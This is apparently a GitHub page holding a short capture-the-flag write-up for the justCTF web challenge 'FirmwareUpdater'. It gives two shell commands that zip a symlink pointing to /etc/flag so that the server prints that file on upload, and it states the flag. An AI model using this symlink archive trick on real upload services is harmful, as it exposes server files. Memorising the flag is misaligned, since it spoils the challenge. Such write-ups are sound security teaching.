Skip to content

Latest commit

 

History

History

firmware-updater

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

../

FirmwareUpdater

WEB - Points: 106

This device need a firmware! Upload and execute ASAP!

Solution

Create a ZIP file that contains a symlink to /etc/flag with the name README.md:

$ ln -s /etc/flag README.md
$ zip --symlinks -u empty.zip README.md

Upload the file and the flag is printed out.

flag: justCTF{A_Fin3_W4y_T0_Upd4t3_m3_y0}